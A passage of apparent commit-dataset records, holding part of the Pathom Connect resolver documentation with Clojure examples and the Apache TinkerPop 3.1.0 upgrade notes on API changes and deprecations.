that your\ndata source does not need to remotely match the schema of your graph query.\n\nPathom will scan through the defined resolvers in order to try to satisfy all of the properties in a query. So, technically\nyou can split up your queries as much as makes sense into separate resolvers, and as long as the inputs are in the context\nPathom will assemble things back together.\n\nOf course, it doesn't make sense in this case to do so, because each resolver would end up running a new query:\n\n[source,clojure]\n----\n(pc\/defresolver person-age-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/age]}\n (let [person (my-database\/get-person database id)]\n {:person\/age (:age person)}))\n\n(pc\/defresolver person-first-name-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name]}\n (let [person (my-database\/get-person database id)]\n {:person\/first-name (:first-name person)}))\n\n...\n----\n\nThe point is that a single-level query like `[:person\/id :person\/first-name :person\/age]` can be satisfied and \"folded together\"\nby Pathom over any number of resolvers.\n\nThis fact is the basis of parser (de)composition and extensibility. It can also come in handy for performance\nrefinements when there are computed attributes.\n\n== Derived\/Computed Attributes\n\nThere are times when you'd like to provide an attribute that is computed in some fashion. You can, of course, simply\ncompute it within the resolver along with other properties like so:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/full-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name\n :person\/full-name (str first-name \" \" last-name) ; COMPUTED\n ...}))\n----\n\nbut this means that you'll take the overhead of the computation when *any* query relate to person comes up. You can\ninstead spread such attributes out into other resolvers as we discussed previously, which will only be invoked if the\nquery actually asks for those properties:\n\n[source,clojure]\n----\n(pc\/defresolver person-resolver [{:keys [database] :as env} {:keys [person\/id]}]\n {::pc\/input #{:person\/id}\n ::pc\/output [:person\/first-name :person\/last-name :person\/age]}\n (let [{:keys [age first-name last-name]} (my-database\/get-person database id)]\n {:person\/age age\n :person\/first-name first-name\n :person\/last-name last-name}))\n\n(pc\/defresolver person-name-resolver [_ {:person\/keys [first-name last-name]}]\n {::pc\/input #{:person\/first-name :person\/last-name}\n ::pc\/output [:person\/full-name]}\n {:person\/full-name (str first-name \" \" last-name)})\n----\n\nThis combination of resolvers can still resolve all of the properties in `[:person\/full-name :person\/age]` (if\n`:person\/id` is in the context), but a query for just `[:person\/age]` won't invoke any of the logic for the\n`person-name-resolver`.\n\n== Single Inputs -- Establishing Context [[SingleInputs]]\n\nSo far we have seen how to define a resolver that can work *as long as* the inputs are already in the environment. You're\nalmost certainly wondering how to do that.\n\nOne way is to define <<GlobalResolvers,global resolvers>> and start the query from them, but very often you'd just\nlike to be able to say \"I'd like the first name of person with id 42.\"\n\nEQL uses \"idents\" to specify exactly that sort of query:\n\n[source,clojure]\n----\n[{[:person\/id 42] [:person\/first-name]}]\n----\n\nThe above is a join on an ident, and the expected result is a map with the ident as a key:\n\n[source,clojure]\n----\n{[:person\/id 42] {:person\/first-name \"Joe\"}}\n----\n\nThe query *itself* has everything you need to establish the *context* for running the `person-resolver`,\nand in fact that is how Pathom single-input resolvers work.\n\nIf you use an ident in a query then Pathom is smart enough to know that it can use that ident to establish the context\nfor finding resolvers. In other words, in the query above the ident `[:person\/id 42]` is turned\ninto the *parsing context* `{:person\/id 42}`, which satisfies the *input* of any resolver that needs\n`:person\/id` to run.\n\n== Resolver Without Input -- Global Resolver [[GlobalResolvers]]\n\nA resolver that requires no input can output its results at any point in the graph, thus it is really a global resolver.\nPay a particular attention to the *\"at any point in the graph\"* - it's not just at the root. Thus, a resolver without inputs\ncan \"inject\" its outputs into any level of the query graph result.\n\nWe're going to start building a parser that can satisfy queries about a music store. So, we'll start with a global resolver\nthat can resolve the \"latest product\". The code below shows the entire code needed, boilerplate and all:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started.cljs[]\n----\n\nOur first resolver exposes the attribute `::latest-product`, and since it doesn't require any input it is a global resolver.\nAlso, note that our output description includes the full output details (including nested attributes), this is mostly\nuseful for auto-completion on UI's and automatic testing. If you return extra data it will still end up in the output\ncontext.\n\nTry some of these queries on the demo below:\n\n[source,clojure]\n----\n[::latest-product]\n[{::latest-product [:product\/title]}]\n\n; ::latest-product can be requested anywhere\n[{::latest-product\n [* ::latest-product]}]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started\" class=\"loader\">\n[::latest-product]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== Resolvers with single input\n\nNext, let's say we want to have a new attribute which is the brand of the product. Of course, we could just throw the\ndata there in our other resolver, but the real power of Connect comes out when we start splitting the responsibilities\namong resolvers, so let's define a resolver for brand that requires an input of `:product\/id`:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/getting_started2.cljs[]\n----\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.getting-started2\" class=\"loader\">\n[{::latest-product [:product\/title :product\/brand]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nThe input is a `set` containing the keys required on the current entity in the parsing context for the resolver to be\nable to work. This is where `Connect` starts to shine because any time your query asks for a bit of data\nit will try to figure it out how to satisfy that request based on the attributes that the current contextual entity *already has*.\n\nMore importantly: `Connect` will *explore the dependency graph* in order to resolve things if it needs to!\nTo illustrate this, let's pretend we have some external ID for the brand and that we can derive this ID from the\nbrand string - pretty much just another mapping:\n\n[source,clojure]\n----\n;; a silly pretend lookup\n(def brand->id {\"Taylor\" 44151})\n\n(pc\/defresolver brand-id-from-name [_ {:keys [product\/brand]}]\n {::pc\/input #{:product\/brand}\n ::pc\/output [:product\/brand-id]}\n {:product\/brand-id (get brand->id brand)})\n\n(comment\n (parser {} [{::latest-product [:product\/title :product\/brand-id]}])\n ; => #::{:latest-product #:product{:title \"Acoustic Guitar\", :brand-id 44151}}\n)\n----\n\nNote that our query never said anything about the `:product\/brand`. `Connect` automatically walked the path\n`:product\/id -> :product\/brand -> :product\/brand-id` to obtain the information desired by the query!\n\nWhen a required attribute is not present in the current entity, `Connect` will look for resolvers that can fetch it,\nanalyze their inputs, and recursively walk backwards towards the \"known data\" in the context.\nWhen a required attribute is not present in the current entity, `Connect` will calculate the possible paths\nfrom the data you have to the data you request, then it can use some heuristic to decide which path to take\nand walk this path to reach the data, if there is no possible path connect reader will return `::p\/continue` to\nlet another reader try to handle that key. You can read more about how this works in the Index page.\n\nAlso remember that single-input resolvers can handle ident-based queries.\nThus, the following ident-join queries already work without having to define anything else:\n\n[source,clojure]\n----\n(parser {} [{[:product\/id 1] [:product\/brand]}])\n; => {[:product\/id 1] #:product{:brand \"Taylor\"}}\n\n(parser {} [{[:product\/brand \"Taylor\"] [:product\/brand-id]}])\n; => {[:product\/brand \"Taylor\"] #:product{:brand-id 44151}}\n----\n\n== Multiple inputs\n\nThe input to a resolver is a set, and as such you can require more than one thing as input to your resolvers. When doing\nso, of course, your resolver function will receive all of the inputs requested; however, this also means that the parsing\ncontext needs to contain them, or there must exist other resolvers that can use what's in the context to fill them in.\n\nAs you have seen before, the only way to provide ad-hoc information to connect is using the ident query, but in the ident\nitself you can only provide one attribute at a time.\n\nSince version `2.2.0-beta11` the ident readers from connect (`ident-reader` and `open-ident-reader`) support adding extra\ncontext to the query using parameters. Let's say you want to load some customer data but you want to reduce the number\nof resolvers called by providing some base information that you already have, you can issue a query like this:\n\n[source,clojure]\n----\n[{([:customer\/id 123] {:pathom\/context {:customer\/first-name \"Foo\" :customer\/last-name \"Bar\"}})\n [:customer\/full-name]}]\n----\n\n== Alias resolvers\n\nSometimes you might want to make an alias, that is, create a resolver which just converts one\nname to another. For example:\n\n[source,clojure]\n----\n(pc\/defresolver alias-youtube-video [env {:user\/keys [youtube-video-url]}]\n {::pc\/input #{:user\/youtube-video-url}\n ::pc\/output [:youtube.video\/id]}\n {:youtube.video\/id youtube-video-url})\n----\n\nThe previous resolver will convert `:user\/youtube-video-url` to `:youtube.video\/id`. To make\nthat easy, Pathom provides some helpers:\n\n[source,clojure]\n----\n; this returns a resolver that works just like the previous resolver\n(def alias-youtube-video (pc\/alias-resolver :user\/youtube-video-url :youtube.video\/id))\n----\n\nIf you want to create an alias that goes in both directions, use `pc\/alias-resolver2`.\n\n== Parameters\n\nParameters enable another dimension of information to be added to the request. Params have\ndifferent semantics from inputs: inputs are more a `dependency` thing while params are\nmore like options. In practice, the main difference is that inputs are something Pathom\nwill try to look up and make available, while parameters must always be provided at\nquery time, there have no auto resolution.\nCommon cases to use parameters are: pagination, sorting, filtering...\n\nLet's write a resolver that outputs a sequence of instruments which can optionally be sorted\nvia a sorting criteria specified via a parameter.\n\n[source,clojure]\n----\n(pc\/defresolver instruments-list [env _]\n {::pc\/output [{::instruments [:instrument\/id :instrument\/brand\n :instrument\/type :instrument\/price]}]}\n (let [{:keys [sort]} (-> env :ast :params)] ; <1>\n {::instruments (cond->> instruments\n (keyword? sort) (sort-by sort))}))\n----\n\n<1> Pulls the parameters from the environment\n\nThen we can run queries like:\n\n[source,clojure]\n----\n[(::instruments {:sort :instrument\/brand})]\n[(::instruments {:sort :instrument\/price})]\n[(::instruments {:sort :instrument\/type})]\n\n; params with join\n\n[{(::instruments {:sort :instrument\/price})\n [:instrument\/id\n :instrument\/brand]}]\n----\n\nTry it out:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.parameters\" class=\"loader\">\n[(::instruments {:sort :instrument\/price})]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\n== N+1 Queries and Batch resolvers\n\nWhen you have a to-many relation that is being resolved by a parser, you will typically end up with a single query that\nfinds the \"IDs\", and then `N` more queries to fill in the details of each item in the sequence. This is known as the\n`N+1` problem, and can be a source of significant performance problems.\n\nInstead of running a resolver once for each item on the list, the idea to solve this problem is to send all the inputs\nas a sequence, so the resolver can do some optimal implementation to handle multiple items. When this happens,\nwe call it a batch resolver. For example, let's take a look at the following demo:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNOTE: This demo is using Pathom async parsers. The resolvers in async parsers can return channels that (eventually)\nresolve to the result, which is why you see `go` blocks in the code. See <<AsyncParsing, Async Parsing>> for more details.\nWe use them in this demo so we can \"sleep\" in a Javascript environment to mimic overhead in processing.\nIn the rest of the book we recommend using the parallel parser, the reason to use the async parser in this demo is\nthat it more easily demonstrates the `N+1` issue.\n\nYou can note by the tracer that it took one second for each entry, a clear cascade,\nbecause it had to call the `:number-added` resolver once for each item.\n\nWe can improving that by turning this into a batch resolver, like this:\n\n[source,clojure]\n----\ninclude::example$com\/wsscode\/pathom\/book\/connect\/batch2.cljs[]\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch2\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNote that this time the sleep of one second only happened once, this is because when Pathom is processing a list and the\nresolver supports batching, the resolver will get all the inputs in a single call, so your batch resolver can get all\nthe items in a single iteration. The results will be cached back for each entry, this will make the other items hit the\ncache instead of calling the resolver again.\n\n=== Batch transforms [[resolver-batch-transform]]\n\nStarting on version `2.2.0` Pathom add some helpers to facilitate the creation of batch resolvers using Pathom\n<<connect-transform,transform>> facilities.\n\nIn the previous example we manually detected if input was a sequence, this API is made this way so the resolver\nkeeps compatibility with the regular resolver API, but often it is easier if you get a consistent input (always a sequence\nfor example). We can enforce this using a transform:\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ input]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; use the transform, note we removed ::pc\/batch? true, that's because the transform\n ; will add this for us\n ::pc\/transform pc\/transform-batch-resolver}\n (go\n (async\/<! (async\/timeout 1000))\n ; no need to detect sequence, it is always a sequence now\n (mapv (fn [v] {:number-added (inc (:number v))}) input)))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.batch3\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nAnother helper that Pathom provides is to transform a serial resolver that would run\none by one, into a batch that runs at concurrency `n`.\n\n[source,clojure]\n----\n(pc\/defresolver slow-resolver [_ {:keys [number]}]\n {::pc\/input #{:number}\n ::pc\/output [:number-added]\n ; set auto-batch with concurrency of 10\n ::pc\/transform (pc\/transform-auto-batch 10)}\n (go\n (async\/<! (async\/timeout 1000))\n ; dealing with the single case, as in the first example we did on batch\n {:number-added (inc number)}))\n----\n\nTry the demo:\n\n++++\n<div x-app=\"interactive-parser\" data-parser=\"connect.transform-auto-batch\" class=\"loader\">\n[{:items [:number-added]}]\n<\/div>\n<div class=\"space\"><\/div>\n++++\n\nNote this time we did called resolver fn multiple times but in parallel, the way this may\nimpact the performance will vary case by case, I suggest giving some thought on the best\nstrategy for each case individually.\n\n=== Aligning results\n\nOften times when you do a batch request to some service\/api the results won't come in\nthe same order of the request, also the count might not match in case some of the items\non request were invalid. To facilitate the coding of these cases Pathom provides\na helper to correctly sort the results back, for more info check the docs about\nlink:https:\/\/cljdoc.org\/d\/com.wsscode\/pathom\/CURRENT\/api\/com.wsscode.pathom.connect#batch-restore-sort[batch-restore-sort on cljdoc].\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e9e580585e9834005bd8e0e67e72f0d4f205564b","subject":"Update upgrade docs to include date and link to changelog.","message":"Update upgrade docs to include date and link to changelog.\n","repos":"samiunn\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,n-tran\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,newkek\/incubator-tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,edgarRd\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,robertdale\/tinkerpop,velo\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,apache\/incubator-tinkerpop,newkek\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,robertdale\/tinkerpop,samiunn\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,n-tran\/incubator-tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,jorgebay\/tinkerpop,gdelafosse\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,n-tran\/incubator-tinkerpop,velo\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,artem-aliev\/tinkerpop,PommeVerte\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,artem-aliev\/tinkerpop","old_file":"docs\/src\/upgrade-release-3.1.x-incubating.asciidoc","new_file":"docs\/src\/upgrade-release-3.1.x-incubating.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nTinkerPop 3.1.0\n===============\n\nimage::https:\/\/raw.githubusercontent.com\/apache\/incubator-tinkerpop\/master\/docs\/static\/images\/gremlin-gangster.png[width=225]\n\n*A 187 On The Undercover Gremlinz*\n\nTinkerPop 3.1.0\n---------------\n\n*Release Date: November 16, 2015*\n\nPlease see the link:https:\/\/github.com\/apache\/incubator-tinkerpop\/blob\/3.1.0-incubating\/CHANGELOG.asciidoc#tinkerpop-310-release-date-november-16-2015] for a complete list of all the modifications that are part of this release.\n\nAdditional upgrade information can be found here:\n\n* <<_tinkerpop_3_0_2,TinkerPop 3.0.2>>\n* <<_tinkerpop_3_0_1,TinkerPop 3.0.1>>\n\nUpgrading for Users\n~~~~~~~~~~~~~~~~~~~\n\nShading Jackson\n^^^^^^^^^^^^^^^\n\nThe Jackson library is now shaded to `gremlin-shaded`, which will allow Jackson to version independently without\nbreaking compatibility with dependent libraries or with those who depend on TinkerPop. The downside is that if a\nlibrary depends on TinkerPop and uses the Jackson classes, those classes will no longer exist with the standard\nJackson package naming. They will have to shifted as follows:\n\n* `org.objenesis` becomes `org.apache.tinkerpop.shaded.objenesis`\n* `com.esotericsoftware.minlog` becomes `org.apache.tinkerpop.shaded.minlog`\n* `com.fasterxml.jackson` becomes `org.apache.tinkerpop.shaded.jackson`\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-835[TINKERPOP3-835]\n\nPartitionStrategy and VertexProperty\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n`PartitionStrategy` now supports partitioning within `VertexProperty`. The `Graph` needs to be able to support\nmeta-properties for this feature to work.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-333[TINKERPOP3-333]\n\nGremlin Server and Epoll\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nGremlin Server provides a configuration option to turn on support for Netty\nlink:http:\/\/netty.io\/wiki\/native-transports.html[native transport] on Linux, which has been shown to help improve\nperformance.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-901[TINKERPOP3-901]\n\nRebindings Deprecated\n^^^^^^^^^^^^^^^^^^^^^\n\nThe notion of \"rebindings\" has been deprecated in favor of the term \"aliases\". Alias is a better and more intuitive\nterm than rebindings which should make it easier for newcomers to understand what they are for.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-913[TINKERPOP3-913],\nlink:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-incubating\/#_aliases[Reference Documentation - Aliases]\n\nConfigurable Driver Channelizer\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe Gremlin Driver now allows the `Channerlizer` to be supplied as a configuration, which means that custom\nimplementations may be supplied.\n\nSee: https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-680[TINKERPOP3-680]\n\nGraphSON and Strict Option\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `GraphMLReader` now has a `strict` option on the `Builder` so that if a data type for a value is invalid in some\nway, GraphMLReader will simply skip that problem value. In that way, it is a bit more forgiving than before especially\nwith empty data.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-756[TINKERPOP3-756]\n\nTransaction.close() Default Behavior\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe default behavior of `Transaction.close()` is to rollback the transaction. This is in contrast to previous versions\nwhere the default behavior was commit. Using rollback as the default should be thought of as a like a safer approach\nto closing where a user must now explicitly call `commit()` to persist their mutations.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805] for more information.\n\nThreadLocal Transaction Settings\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `Transaction.onReadWrite()` and `Transaction.onClose()` settings now need to be set for each thread (if another\nbehavior than the default is desired). For gremlin-server users that may be changing these settings via scripts.\nIf the settings are changed for a sessionless request they will now only apply to that one request. If the settings are\nchanged for an in-session request they will now only apply to all future requests made in the scope of that session.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nHadoop-Gremlin\n^^^^^^^^^^^^^^\n\n* Hadoop1 is no longer supported. Hadoop2 is now the only supported Hadoop version in TinkerPop.\n* Spark and Giraph have been split out of Hadoop-Gremlin into their own respective packages (Spark-Gremlin and Giraph-Gremlin).\n* The directory where application jars are stored in HDFS is now `hadoop-gremlin-x.y.z-libs`.\n** This versioning is important so that cross-version TinkerPop use does not cause jar conflicts.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-616\n\nSpark-Gremlin\n^^^^^^^^^^^^^\n\n* Providers that wish to reuse a graphRDD can leverage the new `PersistedInputRDD` and `PersistedOutputRDD`.\n** This allows the graphRDD to avoid serialization into HDFS for reuse. Be sure to enabled persisted `SparkContext` (see documentation).\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-868,\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-925\n\nTinkerGraph Serialization\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\nTinkerGraph is serializable over Gryo, which means that it can shipped over the wire from Gremlin Server. This\nfeature can be useful when working with remote subgraphs.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-728[TINKERPOP3-728]\n\nDeprecation in TinkerGraph\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `public static String` configurations have been renamed. The old `public static` variables have been deprecated.\nIf the deprecated variables were being used, then convert to the replacements as soon as possible.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-926[TINKERPOP3-926]\n\nDeprecation in Gremlin-Groovy\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe closure wrappers classes `GFunction`, `GSupplier`, `GConsumer` have been deprecated. In Groovy, a closure can be\nspecified using `as Function` and thus, these wrappers are not needed. Also, the `GremlinExecutor.promoteBindings()`\nmethod which was previously deprecated has been removed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-879[TINKERPOP3-879],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-897[TINKERPOP3-897]\n\nGephi Traversal Visualization\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe process for visualizing a traversal has been simplified. There is no longer a need to \"name\" steps that will\nrepresent visualization points for Gephi. It is possible to just \"configure\" a `visualTraversal` in the console:\n\n[source,text]\ngremlin> :remote config visualTraversal graph vg\n\nwhich creates a special `TraversalSource` from `graph` called `vg`. The traversals created from `vg` can be used\nto `:submit` to Gephi.\n\nSee: link:http:\/\/tinkerpop.incubator.apache.org\/docs\/3.1.0-SNAPSHOT\/#gephi-plugin[Reference Documentation - Gephi]\n\nAlterations to GraphTraversal\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThere were a number of changes to `GraphTraversal`. Many of the changes came by way of deprecation, but some semantics\nhave changed as well:\n\n* `ConjunctionStrategy` has been renamed to `ConnectiveStrategy` (no other behaviors changed).\n* `ConjunctionP` has been renamed to `ConnectiveP` (no other behaviors changed).\n* `DedupBijectionStrategy` has been renamed (and made more effective) as `FilterRankingStrategy`.\n* The `GraphTraversal` mutation API has change significantly with all previous methods being supported but deprecated.\n** The general pattern used now is `addE('knows').from(select('a')).to(select('b')).property('weight',1.0)`.\n* The `GraphTraversal` sack API has changed with all previous methods being supported but deprecated.\n** The old `sack(mult,'weight')` is now `sack(mult).by('weight')`.\n* `GroupStep` has been redesigned such that there is now only a key- and value-traversal. No more reduce-traversal.\n** The previous `group()`-methods have been renamed to `groupV3d0()`. To immediately upgrade, rename all your `group()`-calls to `groupV3d0()`.\n** To migrate to the new `group()`-methods, what was `group().by('age').by(outE()).by(sum(local))` is now `group().by('age').by(outE().sum())`.\n* There was a bug in `fold()`, where if a bulked traverser was provided, the traverser was only represented once.\n** This bug fix might cause a breaking change to a user query if the non-bulk behavior was being counted on. If so, used `dedup()` prior to `fold()`.\n* Both `GraphTraversal().mapKeys()` and `GraphTraversal.mapValues()` has been deprecated.\n** Use `select(keys)` and `select(columns)`. However, note that `select()` will not unroll the keys\/values. Thus, `mapKeys()` => `select(keys).unfold()`.\n* The data type of `Operator` enums will now always be the highest common data type of the two given numbers, rather than the data type of the first number, as it's been before.\n\nAliasing Remotes in the Console\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe `:remote` command in Gremlin Console has a new `alias` configuration option. This `alias` option allows\nspecification of a set of key\/value alias\/binding pairs to apply to the remote. In this way, it becomes possible\nto refer to a variable on the server as something other than what it is referred to for purpose of the submitted\nscript. For example once a `:remote` is created, this command:\n\n[source,text]\n:remote alias x g\n\nwould allow \"g\" on the server to be referred to as \"x\".\n\n[source,text]\n:> x.E().label().groupCount()\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-914[TINKERPOP3-914]\n\nUpgrading for Providers\n~~~~~~~~~~~~~~~~~~~~~~~\n\nIMPORTANT: It is recommended that providers also review all the upgrade instructions specified for users. Many of the\nchanges there may prove important for the provider's implementation.\n\nAll providers should be aware that Jackson is now shaded to `gremlin-shaded` and could represent breaking change if\nthere was usage of the dependency by way of TinkerPop, a direct dependency to Jackson may be required on the\nprovider's side.\n\nGraph System Providers\n^^^^^^^^^^^^^^^^^^^^^^\n\nGraphStep Alterations\n+++++++++++++++++++++\n\n* `GraphStep` is no longer in `sideEffect`-package, but now in `map`-package as traversals support mid-traversal `V()`.\n* Traversals now support mid-traversal `V()`-steps. Graph system providers should ensure that a mid-traversal `V()` can leverage any suitable index.\n\nSee link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-762\n\nDecomposition of AbstractTransaction\n++++++++++++++++++++++++++++++++++++\n\nThe `AbstractTransaction` class has been abstracted into two different classes supporting two different modes of\noperation: `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`, where the former should be used when\nsupporting `ThreadLocal` transactions and the latter for threaded transactions. Of course, providers may still\nchoose to build their own implementation on `AbstractTransaction` itself or simply implement the `Transaction`\ninterface.\n\nThe `AbstractTransaction` gains the following methods to potentially implement (though default implementations\nare supplied in `AbstractThreadLocalTransaction` and `AbstractThreadedTransaction`):\n\n* `doReadWrite` that should execute the read-write consumer.\n* `doClose` that should execute the close consumer.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-765[TINKERPOP3-765],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-885[TINKERPOP3-885]\n\nTransaction.close() Default Behavior\n++++++++++++++++++++++++++++++++++++\n\nThe default behavior for `Transaction.close()` is to rollback the transaction and is enforced by tests, which\npreviously asserted the opposite (i.e. commit on close). These tests have been renamed to suite the new semantics:\n\n* `shouldCommitOnCloseByDefault` became `shouldCommitOnCloseWhenConfigured`\n* `shouldRollbackOnCloseWhenConfigured` became `shouldRollbackOnCloseByDefault`\n\nIf these tests were referenced in an `OptOut`, then their names should be updated.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-805[TINKERPOP3-805]\n\nGraph Traversal Updates\n+++++++++++++++++++++++\n\nThere were numerous changes to the `GraphTraversal` API. Nearly all changes are backwards compatible with respective\n\"deprecated\" annotations. Please review the respective updates specified in the \"Graph System Users\" section.\n\n* `GraphStep` is no longer in `sideEffect` package. Now in `map` package.\n* Make sure mid-traversal `GraphStep` calls are folding `HasContainers` in for index-lookups.\n* Think about copying `TinkerGraphStepStrategyTest` for your implementation so you know folding is happening correctly.\n\nElement Removal\n+++++++++++++++\n\n`Element.Exceptions.elementAlreadyRemoved` has been deprecated and test enforcement for consistency have been removed.\n Providers are free to deal with deleted elements as they see fit.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-297[TINKERPOP3-297]\n\nVendorOptimizationStrategy Rename\n+++++++++++++++++++++++++++++++++\n\nThe `VendorOptimizationStrategy` has been renamed to `ProviderOptimizationStrategy`. This renaming is consistent\nwith revised terminology for what were formerly referred to as \"vendors\".\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP3-876[TINKERPOP3-876]\n\nGraphComputer Updates\n+++++++++++++++++++++\n\n`GraphComputer.configure(String key, Object value)` is now a method (with default implementation).\nThis allows the user to specify engine-specific parameters to the underlying OLAP system. These parameters are not intended\nto be cross engine supported. Moreover, if there are not parameters that can be altered (beyond the standard `GraphComputer`\nmethods), then the provider's `GraphComputer` implementation should simply return and do nothing.\n\nDriver Providers\n^^^^^^^^^^^^^^^^\n\nAliases Parameter\n+++++++++++++++++\n\nThe \"rebindings\" argument to the \"standard\" `OpProcessor` has been renamed to \"aliases\". While \"rebindings\" is still\nsupported it is recommended that the upgrade to \"aliases\" be made as soon as possible as support will be removed in\nthe future. Gremlin Server will not accept both parameters at the same time - a request must contain either one\nparameter or the other if either is supplied.\n\nSee: 